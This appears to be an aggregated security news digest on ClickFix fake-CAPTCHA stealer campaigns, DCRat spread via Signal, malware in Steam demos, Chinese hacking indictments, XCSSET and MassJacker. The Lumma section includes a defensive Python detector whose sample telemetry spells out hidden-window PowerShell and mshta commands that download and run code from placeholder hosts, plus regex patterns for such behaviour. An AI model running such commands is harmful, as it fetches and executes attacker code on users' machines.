This 'ClickFix' attack redirects victims to malicious webpages delivering fake CAPTCHA verifications, ultimately deploying information-stealing malware such as Lumma Stealer and Vidar Stealer. Over 100 car dealerships have already been impacted by a supply-chain attack involving injected malicious code, and Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry using the same 'ClickFix' technique. Security experts advise users to exercise extreme caution with unsolicited instructions, especially those prompting system commands.
References:
- Blog: Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry by masquerading as Booking.com communications. Initiated in December 2024, this campaign leverages a social engineering tactic known as ClickFix to disseminate credential-stealing malware.
- Malware ? Graham Cluley: A security researcher has discovered that the websites of over 100 car dealerships have been compromised in a supply-chain attack that attempted to infect the PCs of internet visitors.
- www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
- : Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT via malicious PowerShell commands, according to HP
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
- www.bleepingcomputer.com: Steam pulls game demo infecting Windows with info-stealing malware
do son@securityonline.info
//
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing remote access trojan (RAT), raising serious privacy concerns. According to a recently published report, a threat cluster tracked as UAC-0200 is behind the campaign, which targets high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which uses the Dark Crystal RAT (aka DCRat) to compromise systems.
The messages are sent over Signal from compromised accounts, which lends them credibility, and purport to contain meeting minutes. They entice recipients to download archive files containing a decoy PDF and an executable that deploys DCRat, giving the attackers remote access and control, the ability to steal information and the ability to execute arbitrary commands. CERT-UA attributes the activity to UAC-0200, which has been active since at least summer 2024, and notes that the use of popular messengers increases the attack surface, including by creating uncontrolled information exchange channels.
References:
- cyberinsider.com: Ukraine Warns Signal Used for Spreading RATs on High-Value Targets
- securityonline.info: CERT-UA Alert: DarkCrystal RAT Deployed via Signal in Ukraine
- SOC Prime Blog: Detect UAC-0200 Attacks Using DarkCrystal RAT
- The DefendOps Diaries: Russian Cyber Espionage Targets Ukrainian Military via Signal
- BleepingComputer: Ukrainian military targeted in new Signal spear-phishing attacks
- BleepingComputer: Ukraine's Computer Emergency Response Team (CERT-UA) is warning about highly targeted attacks employing compromised Signal accounts to send malware to employees of defense industry firms and members of the country's army forces.
- securityaffairs.com: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
- The Hacker News: CERT-UA Warns: Dark Crystal RAT Targets Ukrainian Defense via Malicious Signal Messages
- Sam Bent: Report: Cybercriminals Leverage Signal App to Deploy Info-Stealing RAT, Raising Privacy Concerns
- bsky.app: CERT-UA warns of cyber espionage against the Ukrainian defense industry using Dark Crystal RAT
- www.scworld.com: Attackers, tracked under the UAC-0200 threat cluster, leveraged the Signal messaging app to deliver messages purportedly containing minutes of the meeting reports as archive files.
@The DefendOps Diaries
//
Valve has recently removed the video game "Sniper: Phantom's Resolution" from Steam after users discovered that its free demo contained infostealer malware. This marks the second instance in recent months where Steam has been exploited to distribute malicious software, raising concerns about the platform's security measures. The incident came to light when users on Reddit analyzed the demo and reported their findings.
The malware in "Sniper: Phantom's Resolution" follows a similar incident from last month involving a game called "PirateFi," which also turned out to be a malware plant designed to steal player passwords. These incidents emphasize the need for Steam to enhance its vetting process for game demos. Users are advised to exercise caution when downloading and installing content from the platform, ensuring they have up-to-date antivirus software and are vigilant about potential threats.
Recommended read:
References :
- infosec.exchange: NEW: Valve removed a video game from Steam after users reported that its free demo was actually an infostealer malware. Very similar thing happened last month with another video game laced with malware.
- techcrunch.com: Valve removes video game demo suspected of being malware
- The DefendOps Diaries: Steam's Security Challenge: Malware in Game Demos
- CyberInsider: Steam Removes "Sniper: Phantom's Resolution" After Users Find Malware in Demo
- PCMag UK security: Steam Used (Again) To Trick Gamers Into Installing Malware
- www.bleepingcomputer.com: Steam pulls game demo infecting Windows with info-stealing malware
- bsky.app: Valve has removed a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
- bsky.app: Steam has removed the demo of an upcoming game named "Sniper: Phantom's Resolution" for installing malware on user devices.
- BleepingComputer: Valve has removed a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
- bsky.app: Valve removes a game titled 'Sniper: Phantom's Resolution' from the Steam store following multiple user reports that indicated its demo installer actually infected their systems with information stealing malware.
@www.infosecurity-magazine.com
//
Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT (Remote Access Trojan) via malicious PowerShell commands, according to recent findings. The campaigns trick users into running PowerShell commands that ultimately install Lumma Stealer: attackers direct potential victims to attacker-controlled sites and prompt them to complete a fake authentication challenge. Instead of a real CAPTCHA, the page instructs them to press Windows + R and run a PowerShell command, under the false pretense of running "Windows Defender."
These attacks leverage weaponized CAPTCHAs: users are directed to malicious websites and prompted to complete verification steps, and in completing them they inadvertently copy and run PowerShell scripts that download and install malware such as Lumma Stealer. This allows the attackers to steal sensitive data like cryptocurrency wallets. In one variant, fake Cloudflare verification prompts served through infected WordPress sites lead users to execute the malicious PowerShell commands that install the LummaStealer Trojan, posing a significant threat.
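The pattern described above leaves two artifacts a defender can look for: a process-creation event in which the user's shell (explorer.exe, where the Run dialog lives) launches a script host with a hidden window and a download-and-execute command, and an entry in the Run dialog's history (the RunMRU key under HKCU) holding the pasted command. The following detection helper is an added example written for this digest, not code from any of the cited reports or vendors. The telemetry it scores (Sysmon-style parent/image/command-line fields and a RunMRU value map) is constructed inline, the `captcha-verify.example` and `verify-human.example` hostnames are placeholders, and the indicator list and the two-indicator threshold are assumptions to be tuned against your own baseline:

```python
"""Flag fake-CAPTCHA ("paste into Win+R") PowerShell executions.

Hypothetical detection logic, not from the cited reports. It scores
process-creation events and Run-dialog history for the combination
described above: an interactive parent (explorer.exe) starting a script
host with a hidden window and a web-download-plus-invoke command line.
"""
import re

# Each indicator regex is paired with the reason it reports. The list and
# the thresholds below are assumptions for illustration, not vendor rules.
CMD_INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I), "web download"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), "mshta remote HTA"),
    (re.compile(r"not a robot|captcha|verif|defender", re.I), "lure text in command line"),
]
STRONG = {"web download", "invoke-expression", "mshta remote HTA", "encoded command"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog (Win+R) launches come from explorer.exe
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def command_indicators(cmdline: str) -> list[str]:
    """Return the reasons whose regexes match the command line."""
    return [reason for rx, reason in CMD_INDICATORS if rx.search(cmdline)]


def analyze_process(event: dict) -> dict:
    """Score one constructed Sysmon-like process-creation event.

    Flag when the Run dialog's parent starts a script host showing at least two
    indicators, or when any script host shows two strong download/execute
    indicators regardless of parent (assumed threshold; tune to your baseline).
    """
    parent = _basename(event["parent"])
    image = _basename(event["image"])
    reasons = command_indicators(event["cmdline"])
    interactive = parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS
    flagged = (interactive and len(reasons) >= 2) or (
        image in SCRIPT_HOSTS and len(STRONG & set(reasons)) >= 2
    )
    return {"flagged": flagged, "interactive": interactive, "reasons": reasons}


def analyze_runmru(values: dict) -> list[dict]:
    """Scan Run-dialog history (HKCU\\...\\Explorer\\RunMRU) for suspicious commands.

    Each data value is stored as 'command\\1'; the MRUList value orders the
    single-letter value names, most recent first. Returns every entry that
    matches at least one indicator.
    """
    hits = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        reasons = command_indicators(cmd)
        if reasons:
            hits.append({"value": name, "command": cmd, "reasons": reasons})
    return hits


# Constructed sample telemetry (not real captures); hostnames are placeholders.
SAMPLE_EVENTS = [
    {  # user pasted the lure's command into Win+R
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iwr http://captcha-verify.example/x.txt | iex" '
                   "# I am not a robot - reCAPTCHA Verification ID: 7811",
    },
    {  # benign interactive use of the Run dialog
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\cmd.exe",
        "cmdline": "cmd /c ipconfig /all",
    },
    {  # benign scheduled script from a service parent
        "parent": "C:\\Windows\\System32\\services.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    },
    {  # mshta variant of the same lure
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\mshta.exe",
        "cmdline": "mshta https://cloudflare-check.example/verify.hta",
    },
]
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "irm https://verify-human.example/c | iex"\\1',
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev["image"]), analyze_process(ev))
    for hit in analyze_runmru(SAMPLE_RUNMRU):
        print("RunMRU", hit["value"], hit["reasons"])
```

The RunMRU scan is useful in incident response precisely because the lure asks the victim to type or paste the command themselves: the Run dialog history survives even if the process telemetry has rolled over, and its entries are the verbatim command that was executed.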
Recommended read:
References :
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
- : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
- www.cisecurity.org: Active Lumma Stealer Campaign Impacting U.S. SLTTs
Microsoft Threat@Microsoft Security Blog
//
The U.S. Department of Justice has indicted 12 Chinese individuals for over a decade of global hacking intrusions, including a breach of the U.S. Treasury last year. The individuals include eight staffers for the contractor i-Soon, two officials at China’s Ministry of Public Security, and two other alleged hackers belonging to the APT27 group, also known as Silk Typhoon. The group is accused of targeting U.S. state and federal agencies, foreign ministries across Asia, Chinese dissidents, and U.S.-based media outlets critical of the Chinese government.
Microsoft Threat Intelligence has detected a new variant of XCSSET, a macOS malware that targets Xcode projects, the first new variant it has seen since 2022. This variant features enhanced obfuscation, updated persistence mechanisms, and new infection strategies. It steals and exfiltrates files and system/user information, including digital wallet data and notes. The malware's modular approach and encoded payloads make detection and removal challenging, and even allow it to remain fileless.
Recommended read:
Pierluigi Paganini@Security Affairs
//
Cybersecurity researchers at CyberArk have uncovered a new cryptojacking malware campaign called MassJacker. This sophisticated malware targets users who download pirated software, particularly from websites known for distributing malware, such as pesktop[.]com. MassJacker operates as a clipboard hijacker, monitoring the Windows clipboard for copied cryptocurrency wallet addresses.
When a user copies an address, the malware stealthily replaces it with one controlled by the attackers, resulting in the victim unknowingly sending cryptocurrency to the malicious actors instead of the intended recipient. The investigation revealed that MassJacker has been associated with over 750,000 unique cryptocurrency addresses, with one wallet holding over $300,000.
Recommended read: